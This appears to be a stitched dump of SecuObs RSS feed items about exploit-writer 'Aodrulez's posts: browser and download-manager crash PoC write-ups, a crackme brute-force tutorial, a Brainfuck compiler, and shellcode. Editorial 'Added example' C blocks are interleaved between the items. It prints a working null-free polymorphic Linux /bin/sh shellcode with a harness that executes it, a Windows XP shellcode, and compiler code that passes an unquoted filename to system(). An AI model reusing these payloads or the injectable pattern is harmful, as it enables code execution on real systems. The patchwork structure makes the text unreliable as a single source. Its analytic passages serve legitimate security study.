3. www.OrchidSeven.com: for giving me this beautiful opportunity</description><link>http://www.secuobs.com/revue/news/58457.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/58457.shtml</guid></item>
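<![CDATA[
Added example for technique 2 above (the checksum-and-regenerate idea); it is not code from the paper or from its crackme. It models the scheme on a constructed byte array that stands in for the registration routine and is never executed: a home-grown FNV-1a checksum instead of a library CRC, an encrypted master copy that is rewritten into the live buffer before every use, and, beside it, the naive "scan for 0xCC" detector to show why that is not a substitute. The bytes, the XOR key and every function name are this example's own assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for a registration routine (x86 bytes; never executed
 * here): push ebp / mov ebp,esp / mov eax,0xCC / pop ebp / ret.
 * The 0xCC inside the immediate is legitimate code, which is why a raw int3
 * scan is not a reliable patch detector. */
static const uint8_t routine_clean[] = {
    0x55, 0x89, 0xE5, 0xB8, 0xCC, 0x00, 0x00, 0x00, 0x5D, 0xC3
};
#define ROUTINE_LEN (sizeof routine_clean)

/* Home-grown checksum (FNV-1a) instead of a library CRC that tools recognise.
 * Each step is a bijection on the 32-bit state, so changing any byte changes
 * the result. */
uint32_t code_checksum(const uint8_t *p, size_t n)
{
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < n; i++) {
        h ^= p[i];
        h *= 16777619u;
    }
    return h;
}

/* Naive detector: count int3 opcodes. It also counts the immediate above. */
size_t naive_int3_scan(const uint8_t *p, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0xCC)
            hits++;
    return hits;
}

/* Technique 2 state: encrypted master copy, expected checksum, and the live
 * buffer the routine is regenerated into before every use. */
static uint8_t  encrypted_copy[ROUTINE_LEN];
static uint8_t  live_copy[ROUTINE_LEN];
static uint32_t expected_sum;
static const uint8_t demo_key = 0xA5;   /* assumed key; a real build derives it */

/* Rolling XOR; symmetric, so the same call encrypts and decrypts. */
static void xor_crypt(const uint8_t *in, uint8_t *out, size_t n)
{
    for (size_t i = 0; i < n; i++)
        out[i] = in[i] ^ (uint8_t)(demo_key + i);
}

/* app_startup: record the checksum, stash an encrypted copy, NOP the live one. */
void protect_init(void)
{
    expected_sum = code_checksum(routine_clean, ROUTINE_LEN);
    xor_crypt(routine_clean, encrypted_copy, ROUTINE_LEN);
    memset(live_copy, 0x90, ROUTINE_LEN);
}

/* Integrity check on whatever currently sits in the live buffer. */
int protect_verify_live(void)
{
    return code_checksum(live_copy, ROUTINE_LEN) == expected_sum;
}

/* registration_routine: rewrite the live buffer from the encrypted copy, then
 * verify. A 0xCC that a debugger placed in live_copy is overwritten here. */
int protect_regenerate(void)
{
    xor_crypt(encrypted_copy, live_copy, ROUTINE_LEN);
    return protect_verify_live();
}

/* Stands in for a debugger or patcher writing one byte into the live copy. */
void protect_patch_live(size_t off, uint8_t b)
{
    if (off < ROUTINE_LEN)
        live_copy[off] = b;
}

int main(void)
{
    protect_init();
    printf("regenerated, verifies: %d\n", protect_regenerate());
    protect_patch_live(0, 0xCC);                    /* software breakpoint */
    printf("after int3 patch, verifies: %d\n", protect_verify_live());
    printf("regenerated again, verifies: %d\n", protect_regenerate());
    printf("naive int3 hits in clean routine: %zu\n",
           naive_int3_scan(routine_clean, ROUTINE_LEN));
    return 0;
}
```

Running it prints 1, 0, 1 and a hit count of 1: the regenerated copy verifies, the int3 patch fails the checksum, regenerating wipes it, and the 0xCC scan already reports a hit on the clean routine (the immediate of mov eax,0xCC). Two things the paper's "not fool-proof" covers: hardware breakpoints (debug registers) change no bytes, so neither check sees them, and a breakpoint set after regeneration still fires. protect_init here computes expected_sum from the routine at startup for brevity; a real build must bake the expected value in at build time, otherwise an already-patched binary checksums itself as clean.
]]>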
<item><title>Google Chrome input type=file Based Memory Corruption PoC</title><description>Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Tested on version: 0.3.154.9
By: Aodrulez

Google Chrome completely crashes due to an "Access Violation" exception if the user right-clicks any file in the "Open File" dialog that pops up, twice within the same tab or other tabs. If you select any file once, right-click it and select any option, then either click "Open" or "Cancel" and try to do the same again, memory corruption occurs, causing all the tabs and the entire browser to crash.

How to test this PoC:
1. Click the first "Choose File", select any folder or file, right-click and select "Properties". Then cancel the "Open" dialog box.
2. Click the second "Choose File", select any folder or file, and simply right-click to see Google Chrome crash due to an "Access Violation".
------------------------------------------------------------------
Greetz fly out to:
1. LiquidWorm: for being so nice n guiding me :-)
2. str0ke: for going through all my silly e-mails
3. Amforked: my mentor
------------------------------------------------------------------
By: Aodrulez, www.OrchidSeven.com, aodrulez.blogspot.com
Email: f3arm3d3ar@gmail.com

PoC:
------------------------------------------------------------------</description><link>http://www.secuobs.com/revue/news/58456.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/58456.shtml</guid></item>
<item><title>Winget 3.0 Download Manager (Build 112) Remote DOS Exploit PoC</title><description>Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Developer: www.Indentix.com
Tested on: Windows XP Pro SP2 and Google Chrome browser 0.2.149.30
By: Aodrulez

This download manager crashes completely when the attached specially crafted file's contents are copied to the system clipboard. So, if you craft a special HTML file as shown below, the link that it generates completely kills Winget 3.0 remotely.

Usage: Start Winget, minimize its window and then open the HTML file in a browser (fully tested on Google Chrome) and then follow the on-screen instructions. This HTML file downloads a specially crafted text file and renders its contents as a link.

Greetz fly out to:
1. LiquidWorm: for being so nice n guiding me :)
2. str0ke: for going through all my silly e-mails
3. Amforked: my mentor
4. OSRT: this is dedicated to all the members
------------------------------------------------------------------
By: Aodrulez, www.OrchidSeven.com, aodrulez.blogspot.com
Email: f3arm3d3ar@gmail.com

The Exploit:
-----------------------------------------------------------------------------
Aodrulez's Winget 3.0 Download Manager (Build 112) Remote DOS Exploit PoC
Greetz fly out to: LiquidWorm, str0ke and Amforked</description><link>http://www.secuobs.com/revue/news/58455.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/58455.shtml</guid></item>
<item><title>Google Chrome Text-Input based Tab freezing Exploit</title><description>Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - By: Aodrulez
Google Chrome version: 0.2.149.30
Tested on: Windows XP Pro SP2

Google Chrome's tab starts to act totally weird and freezes when you try to open an HTML file as shown below. Here, the actual problem is triggered by an input box to which a large string is fed. Try feeding a still larger string and the tab will be totally useless. Tested and working almost similarly on Opera 9.51, Win32 platform. Try removing this line:
  document.form1.the_box.value = x;
and all the above stated browsers run fine.

PoC:
-----------------------------------------------------------------------------------------------
Aodrulez's Google Chrome Text-Input based Tab freezing Exploit</description><link>http://www.secuobs.com/revue/news/58454.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/58454.shtml</guid></item>
<item><title>Winget 30 Download ManagerBuild 112 Local DOS Exploit PoC</title><description>Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Developer: wwwIndentixcomTested On: Windows Xp Pro Sp2By: AodrulezThis download manager crashes completely when the attachedspeciallycrafted files' contents are copied to System clipboardTo do thistask,I've coded a simple app in Pure Masm32 Usage:Start Winget,minimize its window et then run the applicationMake sure thatWingetpoctxt lies in the same folder asmy exploit PoC appYou canalso open the file et do a ctrl-A et thenctrl-c n see Winget crashPoC:http://wwwsnapdrivenet/files/571814/wingetkillerrarGreetz fly out to:1LiquidWorm : For being so nicen guiding me:2str0ke : For goin thru all my silly e-mails3Amforked : Mymentor4OSRT :- This is dedicated to all the members------------------------------------------------------------------By:Aodrulez, wwwOrchidSevencom, aodrulezblogspotcomEmail: f3arm3d3ar@gmailcom</description><link>http://www.secuobs.com/revue/news/58453.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/58453.shtml</guid></item>
</channel>
</rss>
 
<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Observatoire de la securite Internet</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
 <item><title>Creating your own Abstract Processor</title><description>2011-10-18 16:17:41 -  Aodrulez  : Creating your own Abstract Processor</description><link>http://www.secuobs.com/revue/news/335415.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/335415.shtml</guid></item>
<item><title>Detailed Analysis of My Brainfuck Crackme</title><description>Secuobs.com : 2011-09-01 18:46:55 -  Aodrulez  - The Code

Aodrulez's Brainfuck Crackme V1
-------------------------------------------------
Its very Easy
---------- --  ,,,,,,-         -- --- ------- ----------------- ---------

Let's split it into interesting parts. As we know, in Brainfuck input is taken by the ',' character and output is given by the '.' character. If you've compiled and tried the crackme, it simply asks for a "Serial :". Based on what you enter, it'll decide if it is correct or not. Great, so let's locate the part where it accepts our serial.

Analysis

In the 4th line of the code we can see that it's taking 6 bytes of input: ,,,,,,
Prior to that comes the code which obviously is printing "Serial : " (9 bytes exactly). Let's see what happens after the input:
  --  point to the next memory location (the last char)
  -   decrement the value at that location
  ---------- --
Don't believe me? No worries, try running it in a Brainfuck interpreter online, right here: http://www.iamcal.com/misc/bf_debug . I am sure the above code prints "Serial : ". Now let's analyse the above code:
  increment the memory pointer
  put 10 at that location
  run this loop ten times
What the loop does is put the ASCII codes of the characters you want to print in consecutive memory locations.
  ---------- --  print the string
Now let's look at the last part of the crackme's code, where it obviously has to print a good-boy string. Starting from the end of its code:
  print the good boy string:  -- --- ------- ----------------- ---------
  then the part where it subtracts the ASCII code values between the last 2 characters.
So what exactly is happening? The instruction will again make it point to the last character. Thus the number of iterations for the while loop that prints the good-boy message depends upon the ASCII value of the last character. If you remember, usually the correct value for the while loop to print is 10. Let's check if our assumption is right or not:
  -- --- ------- ----------------- ---------
This was the original code; let's run it in the online interpreter and see the output. You do get an output, but it's gibberish. Now add this to the beginning and see what happens:
  move to the next mem location
  put a value of 10 there
(that is the first part of the crackme's code itself, when it tries to print "Serial :"). When you try to run that, you get this string: "-  Congratulations". So that's perfect. The algo is pretty simple; a valid serial should be:
1. 6 chars long
2. The last character's ASCII code should be 10 units more than the second-last character's.
For example: aaaaak, bbbbbl, cccccm, abcdeo, ABCDEO. That's all.
(c) Aodrulez</description><link>http://www.secuobs.com/revue/news/326538.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/326538.shtml</guid></item>
<item><title>Zen &amp; The Art of Cracking (Part 1)</title><description>Secuobs.com : 2011-09-01 11:02:28 -  Aodrulez  - Hola Amigos :) This is a tutorial explaining some old school (+ORC inspired) reversing/cracking techniques. Today, our target application is a crackme that I wrote a few days ago in an esoteric language named 'Brainfuck'. The code of the crackme can be found here: http://aodrulez.110mb.com/crackme.txt

But before we begin our reversing tutorial, let me show you how to compile this code and make our crackme application. In my previous post I've provided the source code of my 'Brainfuck Pseudo Compiler'. You can compile this crackme using this compiler. First of all, compile the 'Brainfuck Pseudo Compiler' as follows:
  aodrulez@pwn4g3:~/muse$ gcc bfc.c -o bfc
Here I am assuming you've copied the code of my compiler into a file named 'bfc.c'. Once this is done, you should have an executable named 'bfc' which is our Brainfuck compiler. Now let's compile the crackme. Copy the contents of the above link to a file named 'crackme.txt'. Then issue this command:
  aodrulez@pwn4g3:~/muse$ ./bfc crackme.txt crackme
That should compile our 'crackme' for you.

Cracking the Code

Before we do any reversing and fire any of our tools, let's study the crackme first. Let's try running it and see what happens:
  aodrulez@pwn4g3:~/muse$ ./crackme
  Serial : aaaaaa
  aodrulez@pwn4g3:~/muse$
Now that doesn't look like a valid serial :D But one important thing I observed was that it takes exactly '6' bytes (characters) for the serial. Not a byte less, not a byte more. How did I know that? Try entering one character and then hit enter and see what happens, and keep on doing this until you get an output (remember that even 'enter', or line feed, is a char). Now, let's think about it: is there a way to find out the valid serial without even looking at the algorithm? Of course there is; the magic word for you is 'bruteforce'. There are times when the algo involved is so complicated that it's very tough to reverse it and find a valid serial. In such cases, when you have no other choice left, you can always try bruteforce. The truth though is that it's an ugly way of doing things. Why? Lemme explain. Let's say we have a serial the length of which is 1 character. How many possible values can it have? If it's only alphabets: 26. Alphanumeric: 36. Case-sensitive alphanumeric: 26 + 26 + 10 = 62. What do these numbers mean? If the password is just alphabets (case insensitive), the maximum number of possible right answers is 26. So, I hope it's understood that if I try all of these 26 possible values, I am sure to get the right password. But, if the password is 2 characters in size, the max possible combinations become 26 * 26, or 26^2 = 676 (pure permutation). Now that's a pure bruteforce attempt. Alrighty, now how to implement a custom bruteforce tool for our particular crackme? As we know already, the crackme needs an input. So let's try this command in a Linux terminal:
  aodrulez@pwn4g3:~/muse$ echo aaaaaa | ./crackme
What this'll do is it'll first echo aaaaaa to the screen, but the redirection symbol '|' tells it to pipe the output to the command specified, in this case to the crackme executable. This trick, combined with some programming skills, can be turned into a sort of bruteforce attack. So here I am providing a very ugly bruteforce algorithm that I just wrote. It's ugly, not optimized, but sure as hell works. Here we go:
<![CDATA[
/* Bruteforce Code version 1.0 */
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    char b[7];
    b[6] = '\0';
    char brute[50];
    int p, q, r, s, t, u;
    p = q = r = s = t = u = 97;               /* 97 = 'a' */
    /* The listing carried in this feed entry breaks off after "for (p = 97; p";
     * the six nested loops below are completed from the description above:
     * walk 'a'..'z' in every position and pipe each serial into ./crackme. */
    for (p = 97; p <= 122; p++)
     for (q = 97; q <= 122; q++)
      for (r = 97; r <= 122; r++)
       for (s = 97; s <= 122; s++)
        for (t = 97; t <= 122; t++)
         for (u = 97; u <= 122; u++) {
            b[0] = p; b[1] = q; b[2] = r; b[3] = s; b[4] = t; b[5] = u;
            snprintf(brute, sizeof brute, "echo %s | ./crackme", b);
            printf("%s\n", b);
            system(brute);
         }
    return 0;
}
]]>
The crackme's code as carried in this entry:
---------- --  ,,,,,,-         -- --- ------- ----------------- ---------</description><link>http://www.secuobs.com/revue/news/326450.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/326450.shtml</guid></item>
<item><title>Brainfuck Pseudo Compiler</title><description>Secuobs.com : 2011-08-28 22:56:03 -  Aodrulez  - Hola :) Being down with fever has its own fun. Was bored with my mundane stuff and there was no way I could go out. That's when I heard about 'Brainfuck'. Found it interesting and hence ended up writing a pseudo compiler for it. I am calling it a pseudo compiler because this will only parse pure Brainfuck code to equivalent fully working 'C' code and then it uses gcc to compile it into an executable. It does no syntax checking as of now and expects the Brainfuck code to be perfect. Tried and tested, the code is fully functional. It might be vulnerable to buffer overflow attacks here n there, but right now I am too lazy to fix it :)

(The generated program moves x with unchecked ++x/--x over a 65535-byte ram[], so a Brainfuck program that walks off either end of the tape corrupts the stack of the compiled binary, and unbalanced brackets surface only as a gcc error on the emitted while/} pairs.)
<![CDATA[
/*
 * Brainfuck Pseudo Compiler v1.0
 * ------------------------------
 * Author:      Aodrulez
 * Blog:        http://aodrulez.blogspot.com
 * Compilation: gcc bfc.c -o bfc
 * Usage:       ./bfc source [target]
 * Example:     ./bfc game.bf game
 * Note: 'source' file should contain valid Brainfuck code.
 * Extensions of the files don't matter. If no 'target'
 * name is specified, the output will be 'a.out'.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void parse(char *ifname, char *ofname)
{
    int ch;                           /* int, not char, so EOF compares correctly */
    char make[1024];
    FILE *source, *target;

    source = fopen(ifname, "r");
    if (source == NULL) {
        printf("Cannot open source file\n");
        exit(1);
    }
    target = fopen("/tmp/a0d.c", "w");
    if (target == NULL) {
        puts("Cannot create target file\n");
        fclose(source);
        exit(1);
    }
    /* prologue of the generated C program: a data pointer and a zeroed 64K tape */
    fprintf(target, "#include <stdio.h>\n");
    fprintf(target, "int main(void){\n");
    fprintf(target, "int x=0;\n");
    fprintf(target, "char ram[65535]={0};\n");
    /* one C statement per Brainfuck instruction; anything else is a comment */
    while ((ch = fgetc(source)) != EOF) {
        switch (ch) {
        case '>': fprintf(target, "++x;\n");              break;
        case '<': fprintf(target, "--x;\n");              break;
        case '+': fprintf(target, "++ram[x];\n");         break;
        case '-': fprintf(target, "--ram[x];\n");         break;
        case '.': fprintf(target, "putchar(ram[x]);\n");  break;
        case ',': fprintf(target, "ram[x]=getchar();\n"); break;
        case '[': fprintf(target, "while(ram[x]){\n");    break;
        case ']': fprintf(target, "}\n");                 break;
        default:  break;
        }
    }
    fprintf(target, "}\n");
    fclose(source);
    fclose(target);
    if (ofname == NULL) {
        system("gcc /tmp/a0d.c");         /* output defaults to a.out */
    } else {
        /* ofname is passed to the shell unquoted; this is a local dev tool */
        snprintf(make, sizeof make, "gcc /tmp/a0d.c -o %s", ofname);
        system(make);
    }
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("\nBrainfuck Pseudo Compiler\n-------------------------\n");
        printf("Author: Aodrulez\nBlog: http://aodrulez.blogspot.com\n");
        printf("\nUsage: %s source [target]\nEx: %s test.bf test.out\n\n",
               argv[0], argv[0]);
    } else {
        parse(argv[1], argv[2]);          /* argv[2] is NULL when no target is given */
    }
    return 0;
}
]]></description><link>http://www.secuobs.com/revue/news/325669.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/325669.shtml</guid></item>
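<![CDATA[
Added example, not the pseudo compiler above or anything else from these posts: a bounds-checked Brainfuck interpreter in C, the hardened counterpart of the code the compiler generates. Where the compiler emits unchecked ++x/--x over ram[65535] and leaves unbalanced brackets for gcc to notice, this interpreter pairs the brackets before running, refuses tape moves and output past their buffers, returns 0 for a read past the end of input (a design choice; the generated code stores getchar()'s EOF), and gives up after a step budget. The sample programs in main are constructed for the example and the function names are the example's own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BF_TAPE     65535   /* same tape size the pseudo compiler hard-codes */
#define BF_MAX_PROG 4096
#define BF_MAX_OUT  256

enum { BF_OK = 0, BF_ERR_BRACKET, BF_ERR_TAPE, BF_ERR_OUTPUT, BF_ERR_STEPS, BF_ERR_SIZE };

/* Pair every [ with its ]; an unbalanced program is rejected before it runs. */
static int bf_match_brackets(const char *prog, size_t len, size_t *jump)
{
    size_t stack[BF_MAX_PROG];
    size_t sp = 0;
    for (size_t i = 0; i < len; i++) {
        if (prog[i] == '[') {
            stack[sp++] = i;                  /* len <= BF_MAX_PROG, so sp fits */
        } else if (prog[i] == ']') {
            if (sp == 0)
                return BF_ERR_BRACKET;
            size_t open = stack[--sp];
            jump[open] = i;
            jump[i] = open;
        }
    }
    return sp == 0 ? BF_OK : BF_ERR_BRACKET;
}

/* Run prog against input. Output goes to out (NUL-terminated, at most outcap-1
 * bytes). Every tape move and output byte is bounds-checked, a read past the
 * end of input yields 0, and max_steps bounds non-terminating programs. */
int bf_run(const char *prog, const char *input, char *out, size_t outcap,
           unsigned long max_steps)
{
    size_t len = strlen(prog);
    size_t jump[BF_MAX_PROG];
    static unsigned char tape[BF_TAPE];
    size_t ip = 0, dp = 0, op = 0, inpos = 0;
    unsigned long steps = 0;
    int rc;

    if (outcap == 0)
        return BF_ERR_OUTPUT;
    out[0] = '\0';
    if (len > BF_MAX_PROG)
        return BF_ERR_SIZE;
    if ((rc = bf_match_brackets(prog, len, jump)) != BF_OK)
        return rc;
    memset(tape, 0, sizeof tape);

    while (ip < len) {
        if (++steps > max_steps)
            return BF_ERR_STEPS;
        switch (prog[ip]) {
        case '>': if (dp + 1 >= BF_TAPE) return BF_ERR_TAPE; dp++; break;
        case '<': if (dp == 0) return BF_ERR_TAPE; dp--; break;
        case '+': tape[dp]++; break;
        case '-': tape[dp]--; break;
        case '.':
            if (op + 1 >= outcap) return BF_ERR_OUTPUT;
            out[op++] = (char)tape[dp];
            out[op] = '\0';
            break;
        case ',': tape[dp] = input[inpos] ? (unsigned char)input[inpos++] : 0; break;
        case '[': if (tape[dp] == 0) ip = jump[ip]; break;   /* skip past ] */
        case ']': if (tape[dp] != 0) ip = jump[ip]; break;   /* back to [ */
        default: break;                                      /* comment char */
        }
        ip++;
    }
    return BF_OK;
}

/* Convenience wrappers with a fixed output buffer and step budget. */
int bf_status(const char *prog, const char *input)
{
    char out[BF_MAX_OUT];
    return bf_run(prog, input, out, sizeof out, 100000UL);
}

const char *bf_output(const char *prog, const char *input)
{
    static char out[BF_MAX_OUT];
    bf_run(prog, input, out, sizeof out, 100000UL);
    return out;
}

int main(void)
{
    /* constructed sample programs */
    printf("%s\n", bf_output("++++++++[>++++++++<-]>+.", ""));   /* 8*8+1 = 'A' */
    printf("%s\n", bf_output(",[.,]", "hey"));                    /* echo input */
    printf("tape underflow -> %d\n", bf_status("<.", ""));
    printf("unbalanced     -> %d\n", bf_status("[+", ""));
    printf("infinite loop  -> %d\n", bf_status("+[]", ""));
    return 0;
}
```

The two valid programs print A and hey; the three broken ones come back as BF_ERR_TAPE, BF_ERR_BRACKET and BF_ERR_STEPS instead of running off the tape, failing at gcc time or hanging. It also gives a cheaper way to do the brute force from the tutorial above than one process per serial: feed each candidate to bf_run as input and look at the output, rather than spawning echo | ./crackme.
]]>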
<item><title>Installing PDP11 SIMH Simulator on IOS device</title><description>Secuobs.com : 2011-07-02 13:02:19 -  Aodrulez  - Hi there. It's been a long time since I've made a blog post; well, it's about time I guess :)

Installing PDP11 SIMH Simulator on iOS device
----------------------------------------------------------------------
This should work on iPhone, iPod as well as iPad. I've got it working on iPod Touch 4G running iOS 4.3.3 (latest as of now). Btw, there are 2 ways of doing this. If you own a Mac and have the iOS SDK you can do it right on your computer. Since I am a Linux guy and find it completely weird to own a Mac just to program for a teeny-weeny iDevice, I installed the entire toolchain on my iPod Touch itself. Bwahaha :)

Install Toolchain on your Jailbroken iDevice
---------------------------------------------------------------
Credits: 'MichaelHaseth' from iFans.com (Tnx a ton Michael)
- Install 'fake-libgcc' from Cydia
- Install 'GNU C Compiler' from Cydia
- Copy the attached libraries to /usr/lib/ of your iDevice
- Install 'iPhone 2.0 Toolchain' from Cydia
That's all. Just ssh to your iDevice and type 'gcc' and you are good to go. You can use the Mobile-Terminal too.
Note: I've gotten normal C programs to compile and run just fine; use
  gcc source.c -o app
  ./app

Installing SIMH PDP11 Simulator
-----------------------------------------------
- Unpack and copy the attached header files to /usr/lib of your iDevice
- Unpack the attached simh.zip on your computer and transfer it to a folder on your iDevice, for ex. /tmp
- 'cd' to that folder and type 'make' at the prompt
- It'll take a few seconds to build, and once it's done, inside the 'BIN' folder you'll find the pdp11 executable
- Just copy the required Unix OS images to the folder and you've got a working PDP11 Unix computer on your iDevice
Note:
- I've modified the SIMH makefile and tweaked a few things here and there
- I am not uploading the Unix images cuz of the copyright biaches. Just look up any SIMH tutorial and you are good to go.

Attachments
-------------------
1. gcc_headers.zip
2. headers
3. SIMH-Modified
(c) Aodrulez</description><link>http://www.secuobs.com/revue/news/314876.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/314876.shtml</guid></item>
<item><title>Linux x86 /bin/sh Null-Free Polymorphic Shellcode - 46 bytes</title><description>Secuobs.com : 2011-03-05 19:25:44 -  Aodrulez  - <![CDATA[
/*
 * Aodrulez's /bin/sh Null-Free Polymorphic Shellcode
 * Shellcode size: 46 bytes
 * Special Tnx to 'Chema Garcia (aka sch3m4)'
 * Tested on: Ubuntu 8.04, Hardy Heron
 * Email: f3arm3d3ar at gmail.com
 * Author: Aodrulez (Atul Alex Cherian)
 * Blog: Aodrulez.blogspot.com
 */
#include <stdio.h>
#include <string.h>

/* 25-byte decoder followed by the 21-byte encoded execve("/bin/sh") payload */
char code[] =
    "\xeb\x12\x31\xc9\x5e\x56\x5f\xb1\x15\x8a\x06\xfe\xc8\x88\x06\x46\xe2"
    "\xf7\xff\xe7\xe8\xe9\xff\xff\xff\x32\xc1\x32\xca\x52\x69\x30\x74\x69"
    "\x01\x69\x30\x63\x6a\x6f\x8a\xe4\xb1\x0c\xce\x81";

int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    fprintf(stdout, "Aodrulez's Linux Polym0rphic Shellc0de\nShellcode Size: %d bytes\n",
            (int)strlen(code));
    /* The decoder rewrites its own payload in place, so code[] must sit in
     * memory that is both writable and executable: copy it into an RWX page
     * from mmap, or build with an executable-data setup (e.g. -z execstack,
     * where the kernel still honours it) before running this. */
    (*(void (*)(void))code)();
    return 0;
}
]]>
Greetz Fly Out to:
1. Amforked: my mentor
2. TheBlueGenius: my boss :-)
3. www.orchidseven.com
4. www.isac.org.in
5. www.Malcon.org - World's first Malware Conference</description><link>http://www.secuobs.com/revue/news/289654.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/289654.shtml</guid></item>
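<![CDATA[
Added example, not the author's harness: the same 46 bytes examined without executing them. It splits the decoder (25 bytes) from the encoded payload (21 bytes), resolves the jmp/call/loop displacements by hand, replays the decoder's "subtract one from each byte" loop in C and compares the result with the plain execve("/bin/sh") stub, which holds the 0x00 that the encoding removes. The plain-stub bytes and the disassembly in the comments are this example's own reading of the shellcode, not something the post states; the decoded code leaves edx untouched, so envp is whatever the register held.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DECODER_LEN   25
#define PAYLOAD_LEN   21
#define SHELLCODE_LEN (DECODER_LEN + PAYLOAD_LEN)

/* The 46 bytes from the post, split where the decoder ends. */
const uint8_t shellcode[SHELLCODE_LEN] = {
    /* decoder: jmp short +0x12 ; xor ecx,ecx ; pop esi ; push esi ; pop edi ;
     * mov cl,0x15 ; L: mov al,[esi] ; dec al ; mov [esi],al ; inc esi ;
     * loop L ; jmp edi ; call -0x17 (back to xor ecx,ecx, pushing the
     * payload address onto the stack for the pop esi)                    */
    0xeb, 0x12, 0x31, 0xc9, 0x5e, 0x56, 0x5f, 0xb1, 0x15, 0x8a, 0x06, 0xfe,
    0xc8, 0x88, 0x06, 0x46, 0xe2, 0xf7, 0xff, 0xe7, 0xe8, 0xe9, 0xff, 0xff,
    0xff,
    /* payload: each byte is the real opcode plus one */
    0x32, 0xc1, 0x32, 0xca, 0x52, 0x69, 0x30, 0x74, 0x69, 0x01, 0x69, 0x30,
    0x63, 0x6a, 0x6f, 0x8a, 0xe4, 0xb1, 0x0c, 0xce, 0x81
};

/* What the decoder leaves behind (worked out by hand for this example):
 * xor eax,eax ; xor ecx,ecx ; push ecx ; push 0x0068732f "/sh\0" ;
 * push 0x6e69622f "/bin" ; mov ebx,esp ; mov al,0xb ; int 0x80
 * = execve("/bin/sh", NULL, edx). Note the 0x00 inside the push immediate. */
const uint8_t plain_execve[PAYLOAD_LEN] = {
    0x31, 0xc0, 0x31, 0xc9, 0x51, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 0x2f,
    0x62, 0x69, 0x6e, 0x89, 0xe3, 0xb0, 0x0b, 0xcd, 0x80
};

int has_null_byte(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0x00)
            return 1;
    return 0;
}

/* Replay the decoder loop in C: cl bytes, each decremented by one. */
size_t decode_payload(const uint8_t *sc, uint8_t *out, size_t outcap)
{
    size_t count = sc[8];                       /* immediate of mov cl,imm8 */
    if (sc[7] != 0xb1 || count > outcap || DECODER_LEN + count > SHELLCODE_LEN)
        return 0;
    for (size_t i = 0; i < count; i++)
        out[i] = (uint8_t)(sc[DECODER_LEN + i] - 1);
    return count;
}

const uint8_t *decoded_payload(void)
{
    static uint8_t buf[PAYLOAD_LEN];
    decode_payload(shellcode, buf, sizeof buf);
    return buf;
}

/* Resolve the three relative branches without executing anything:
 * jmp -> call, call -> first decoder instruction, loop -> loop body. */
int verify_decoder_offsets(const uint8_t *sc)
{
    int jmp_target = 2 + (int8_t)sc[1];         /* rel8 from end of the jmp */
    if (sc[0] != 0xeb || jmp_target < 0 || jmp_target + 5 > SHELLCODE_LEN
        || sc[jmp_target] != 0xe8)
        return 0;
    uint32_t raw = (uint32_t)sc[jmp_target + 1]
                 | (uint32_t)sc[jmp_target + 2] << 8
                 | (uint32_t)sc[jmp_target + 3] << 16
                 | (uint32_t)sc[jmp_target + 4] << 24;
    long long rel = (raw & 0x80000000u) ? (long long)raw - 0x100000000LL
                                        : (long long)raw;
    long long call_end = jmp_target + 5;
    if (call_end + rel != 2)                    /* call must land on xor ecx,ecx */
        return 0;
    if (call_end != DECODER_LEN)                /* pushed return addr = payload */
        return 0;
    if (sc[16] != 0xe2 || 18 + (int8_t)sc[17] != 9)  /* loop back to mov al,[esi] */
        return 0;
    return 1;
}

int main(void)
{
    uint8_t buf[PAYLOAD_LEN];
    size_t n = decode_payload(shellcode, buf, sizeof buf);
    printf("encoded null-free: %d, branch offsets consistent: %d\n",
           !has_null_byte(shellcode, SHELLCODE_LEN), verify_decoder_offsets(shellcode));
    printf("decoded %zu bytes, matches plain execve stub: %d, plain stub has NUL: %d\n",
           n, memcmp(buf, plain_execve, n) == 0, has_null_byte(plain_execve, PAYLOAD_LEN));
    return 0;
}
```

The encoded form has no zero byte and the decoded form has exactly the one in push 0x0068732f, which is the reason for the decoder. The offset check is the part worth keeping when you re-encode a payload: the jmp/call pair (the usual way to find the payload address without a NUL) and the loop count in mov cl must all be re-derived whenever the payload length changes.
]]>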
<item><title>Windows XP Pro Sp2 English "Message-Box" Shellcode</title><description>Secuobs.com : 2009-11-12 16:35:09 -  Aodrulez  - Size: 16 bytes, null-free
Author: Aodrulez
Email: f3arm3d3ar@gmail.com
Shellcode:
  \xB9\x38\xDD\x82\x7C\x33\xC0\xBB
  \xD8\x0A\x86\x7C\x51\x50\xFF\xD3

----------------
Description
----------------
I've used a function called FatalAppExit from kernel32.dll. The benefits are three-fold:
1. Displays a MessageBox
2. Terminates the process
3. It's there in kernel32.dll itself
(The two absolute addresses below belong to the English XP SP2 kernel32.dll; a different service pack or language build, or ASLR on Vista and later, moves them.)

--------------
Asm Code
--------------
shellcode:
    mov ecx, 7c82dd38h    ; "Admin" string in memory
    xor eax, eax
    mov ebx, 7c860ad8h    ; address of FatalAppExit in kernel32
